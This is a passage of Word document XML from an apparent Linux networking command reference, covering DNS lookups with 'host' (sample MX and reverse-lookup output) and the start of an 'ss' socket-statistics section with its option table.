            <w:r w:rsidRPr="00251962">
              <w:t>Use IPv4 only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="286BAB0F" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48F824C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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72A7BF88" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Use IPv6 only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="458E3298" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:lastRenderedPageBreak/>
        <w:t>Examples and Use Cases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B37CA61" w14:textId="1DBEAE49" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Basic lookup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265BF14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host google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304455B6" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4898F8F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oogle.com has address 142.251.46.142</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F92F684"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oogle.com has IPv6 address 2607:f8b0:4004:c1b::71</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3407EBF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oogle.com mail is handled by 10 smtp.google.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF322B1" w14:textId="78ADE15B" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Query specific record type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4086A53C"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host -t MX google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087DCCD6" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D27DFA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oogle.com mail is handled by 10 smtp.google.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBB95BB" w14:textId="4DB60BCE" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Reverse lookup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006C0A2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host 8.8.8.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCDCD6F" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EE4AD8" w14:textId="77777777" w:rsidR="005F3C78" w:rsidRPr="00030A25"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8.8.8.8.in-addr.arpa domain name pointer dns.google.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D18FAF" w14:textId="5CEA05D3" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Network Statistics and Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208208E3" w14:textId="7C5671F0" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>ss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379BBDEA" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>ss</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> command is the modern replacement for netstat, displaying socket statistics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD17E7D" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Purpose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEE825D" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:t>Display socket statistics, including TCP, UDP, and Unix domain sockets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480BF47D" w14:textId="3D473FED" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Syntax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DAF3CE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s [options] [filter]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C0F796" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Common Options</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1948"/>
        <w:gridCol w:w="4080"/>
      </w:tblGrid>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="59340507" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03E704C5" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Option</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50AEB3C9" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="49FAB8E3" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3BB1C3AC"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t, --tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DAC6711" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Display TCP sockets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="0BAD8F64" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3293C1C5"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u, --udp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="697D6C38" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Display UDP sockets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="261EFFE7" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C62AA2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w, --raw</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10263DD6" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Display RAW sockets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="4165928C" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E4C0D7F"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x, --unix</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16AE8D0B" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Display Unix domain sockets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="609EF050" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70B3DD7F"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l, --listening</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F454CC5" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Display listening sockets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="1C4B06A0" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C762998"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 --all</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C2681B6" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Display all sockets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="1CA6FE8B" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0549E3FF"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 --numeric</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7EBC6621" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Don't resolve service names</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="77B109FC" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D7FEC64"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 --resolve</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F9CA69F" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Resolve host names</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="02625C49" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DD8FBC9"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p, --processes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="684035F1" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Show process using socket</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="745C9DAE" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="127B080E"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e, --extended</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14F0C906" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Show detailed socket information</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="718A621D" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="201A0663"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m, --memory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2173C647" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Show socket memory usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="5DA4FBE2" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64E2E7F2"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i, --info</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6FE92107" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Show internal TCP information</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="10D7829A" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D5FEE23"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 --summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="043F70D0" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Show socket usage summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="4BE4D523" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36BA19C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4, --ipv4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C7B93E1" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Display IPv4 sockets only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="6DD58694" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24D1749C"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6, --ipv6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="127356CC" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Display IPv6 sockets only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="4ABA4562" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3398DDFE"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0, --packet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A89276D" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Display PACKET sockets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="0E0476D0" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="670490B3"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f FAMILY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35300389" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Display sockets of type FAMILY</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="03E9F1C9" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C4ECD72"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 QUERY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="562C7DFB" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>List of socket tables to dump</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="1B5B8BC7" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40ED5934"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lastRenderedPageBreak/>
              <w:t>-D FILE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C83E7AB" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Dump raw information to file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="1F491755" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="220E0020"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F FILE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E279343" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Read filter from file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="69F8D72F" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5210CEE0"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H, --no-header</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69DD4DA6" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Suppress header line</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="49DF54DA" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A6405E9"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O, --oneline</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A437B56" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>One line per socket</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="66E0A127" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17C71B65"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 --sctp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C72B042" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
